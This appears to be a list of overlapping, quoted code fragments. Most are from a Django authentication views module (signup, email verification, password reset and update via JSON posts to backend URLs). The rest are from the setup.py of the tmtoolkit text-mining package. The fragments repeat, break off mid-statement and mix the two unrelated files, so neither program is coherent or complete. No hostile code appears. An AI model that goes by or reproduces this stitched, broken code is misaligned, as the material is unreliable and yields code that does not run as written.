"django.contrib import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if",
"if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token,",
"sensitive_post_parameters from django.views.decorators.cache import never_cache from django import shortcuts from django.conf import settings",
"form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers = {'Content-type': 'application/json'} res =",
"= {'token': token, 'password': password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload),",
"reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return",
"in.\") else: messages.error(request, \"That reset link does not exist or has expired. Please",
"== 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account. Please check",
"data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password updated successfully. Please log in.\")",
"reset password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm() return render(request, 'registration/password_update.html', {'form':",
"import render from django.conf.urls import url from django.http import HttpResponse from django.views.decorators.csrf import",
"messages.success(request, 'Email Address Verified! Please log in.') return redirect('/auth/login') raise Http404() def reset_password(request):",
"headers=headers) if res.status_code == 200: messages.success(request, \"Password updated successfully. Please log in.\") else:",
"from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from",
"Address Verified! Please log in.') return redirect('/auth/login') raise Http404() def reset_password(request): if request.user.is_authenticated():",
"render from django.conf.urls import url from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect",
"requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password updated successfully. Please log",
"reset link does not exist or has expired. Please request a new reset",
"if request.method == 'POST': form = forms.UserCreationForm(request.POST) if form.is_valid(): messages.success(request, 'Successfully created account.",
"password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if",
"request.GET.get('token') is not None: payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res",
"form}) def verify(request): if request.GET.get('token') is not None: payload = {'token': request.GET.get('token')} headers",
"account. Please check your email to verify your account before logging in.') return",
"from . import forms import requests import json from django.http import Http404 from",
"'Successfully created account. Please check your email to verify your account before logging",
"from django import shortcuts from django.conf import settings from . import forms import",
"data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email Address Verified! Please log in.')",
"raise Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form",
"return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return",
"payload = {'token': request.GET.get('token')} headers = {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers)",
"if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1]",
"= forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if",
"signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST) if",
"from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django import shortcuts from",
"'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>']",
"{'token': token, 'password': password} headers = {'Content-type': 'application/json'} res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers)",
"if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST) if form.is_valid():",
"from django.shortcuts import render from django.conf.urls import url from django.http import HttpResponse from",
"res.status_code == 200: messages.success(request, \"Password updated successfully. Please log in.\") else: messages.error(request, \"That",
"check your email to verify your account before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else:",
"shortcuts from django.conf import settings from . import forms import requests import json",
"@csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form",
"sent a password reset link. Please check your email.\") return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form",
"return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserResetPasswordForm() return render(request, 'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect",
"== 200: messages.success(request, \"Password updated successfully. Please log in.\") else: messages.error(request, \"That reset",
"django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache from django",
"{'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email",
"def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserCreationForm(request.POST)",
"res.status_code == 200: messages.success(request, 'Email Address Verified! Please log in.') return redirect('/auth/login') raise",
"Please request a new reset password link by going to the reset password",
"200: messages.success(request, 'Email Address Verified! Please log in.') return redirect('/auth/login') raise Http404() def",
"forms import requests import json from django.http import Http404 from django.shortcuts import redirect",
"= {'Content-type': 'application/json'} res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request,",
". import forms import requests import json from django.http import Http404 from django.shortcuts",
"has expired. Please request a new reset password link by going to the",
"'registration/reset_password.html', {'form': form}) @sensitive_post_parameters() @csrf_protect @never_cache def password_update(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if",
"import url from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import",
"before logging in.') return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) else: form = forms.UserCreationForm() return render(request, 'registration/signup.html', {'form':",
"updated successfully. Please log in.\") else: messages.error(request, \"That reset link does not exist",
"going to the reset password page.\") return redirect('/auth/login') else: form = forms.UserPasswordUpdateForm() return",
"= requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, 'Email Address Verified! Please",
"if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid():",
"= request.path.rsplit('/', 1)[-1] password = form.cleaned_data['<PASSWORD>'] payload = {'token': token, 'password': password} headers",
"never_cache from django import shortcuts from django.conf import settings from . import forms",
"\"That reset link does not exist or has expired. Please request a new",
"does not exist or has expired. Please request a new reset password link",
"reset password link by going to the reset password page.\") return redirect('/auth/login') else:",
"Http404() def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form =",
"request.method == 'POST': form = forms.UserPasswordUpdateForm(request.POST) if form.is_valid(): token = request.path.rsplit('/', 1)[-1] password",
"HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug import sensitive_post_parameters from django.views.decorators.cache import never_cache",
"import never_cache from django import shortcuts from django.conf import settings from . import",
"import messages @sensitive_post_parameters() @csrf_protect @never_cache def signup(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method",
"forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a password reset link. Please check",
"200: messages.success(request, \"Password updated successfully. Please log in.\") else: messages.error(request, \"That reset link",
"if form.is_valid(): messages.success(request, \"We have sent a password reset link. Please check your",
"def reset_password(request): if request.user.is_authenticated(): return shortcuts.redirect(settings.LOGIN_REDIRECT_URL) if request.method == 'POST': form = forms.UserResetPasswordForm(request.POST)",
"= requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers) if res.status_code == 200: messages.success(request, \"Password updated successfully. Please",
"django.conf.urls import url from django.http import HttpResponse from django.views.decorators.csrf import csrf_protect from django.views.decorators.debug",
"= forms.UserResetPasswordForm(request.POST) if form.is_valid(): messages.success(request, \"We have sent a password reset link. Please",
"else: messages.error(request, \"That reset link does not exist or has expired. Please request",
"a new reset password link by going to the reset password page.\") return",
"'registration/signup.html', {'form': form}) def verify(request): if request.GET.get('token') is not None: payload = {'token':",
"import shortcuts from django.conf import settings from . import forms import requests import"
] |
[
"analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True, python_requires='>=3.6', install_requires=DEPS_BASE, extras_require=DEPS_EXTRA )",
"mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True, python_requires='>=3.6', install_requires=DEPS_BASE, extras_require=DEPS_EXTRA",
"GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA",
"= os.path.abspath(os.path.dirname(__file__)) # Get the long description from the README file with open(os.path.join(here,",
"'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'],",
"'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic",
"'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] =",
"'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'],",
"from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read()",
"'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all']",
"Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text",
"from codecs import open from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__",
"['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim':",
"Language :: Python :: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic ::",
"{ 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn':",
"as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling",
"Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic ::",
"<filename>setup.py<gh_stars>100-1000 \"\"\" tmtoolkit setuptools based setup module \"\"\" import os from codecs import",
"in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long description from",
"'Programming Language :: Python :: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic",
"'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0',",
":: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language ::",
"setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>'",
"GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended",
"OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language",
"f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit',",
"Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language",
"'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved ::",
"'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended']",
"'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long description from the README",
"setuptools based setup module \"\"\" import os from codecs import open from setuptools",
"Get the long description from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as",
"DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if k",
"'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds':",
"'0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE",
"'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k,",
"not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long description",
"'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'],",
"open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining",
":: 3.7', 'Programming Language :: Python :: 3.8', 'Topic :: Scientific/Engineering :: Information",
"DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long description from the README file",
"'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8',",
"['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] +",
"Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming",
"OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming",
"Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, },",
"Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6',",
"text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True, python_requires='>=3.6', install_requires=DEPS_BASE,",
"open from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__",
":: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic :: Scientific/Engineering",
"__version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL =",
"for k, deps in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here",
"System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python ::",
"= { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'],",
":: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python ::",
"setup module \"\"\" import os from codecs import open from setuptools import setup,",
"'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'],",
"Python :: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development",
"'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev':",
"author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience ::",
"'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2',",
"'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] =",
"Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers',",
":: Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing",
"Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System",
"'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development",
"keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True,",
"import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__",
"'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language ::",
"Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language",
"DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda':",
"'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc':",
"= DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if",
":: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation',",
":: Python :: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software",
"name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug",
"author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research',",
"['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0',",
"'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export']",
"DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items():",
"3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8',",
"Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL,",
"the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup(",
"= [] for k, deps in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}:",
":: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software",
"k, deps in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here =",
"= f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst',",
"long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description,",
"from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ =",
"version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports':",
"4 - Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License ::",
"Scientific/Engineering :: Information Analysis', 'Topic :: Software Development :: Libraries :: Python Modules',",
"['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0',",
":: 4 - Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License",
"DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if k not in",
"tmtoolkit setuptools based setup module \"\"\" import os from codecs import open from",
"import os from codecs import open from setuptools import setup, find_packages __title__ =",
"], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']),",
"__author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE =",
"here = os.path.abspath(os.path.dirname(__file__)) # Get the long description from the README file with",
"['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24',",
"deps in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__))",
"['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0',",
"'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python",
"'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'],",
"'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0',",
"['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'],",
"= ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'],",
"'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming",
":: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language ::",
"in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) #",
":: Information Analysis', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic",
"DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get",
"License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language ::",
"[] for k, deps in DEPS_EXTRA.items(): if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps)",
"codecs import open from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ =",
"+ DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if k not",
"['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk':",
"os from codecs import open from setuptools import setup, find_packages __title__ = 'tmtoolkit'",
"long description from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description",
"'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'],",
"'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'Intended Audience ::",
"Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache",
"Analysis', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities',",
"'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for",
"'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling",
"Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis",
"'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ],",
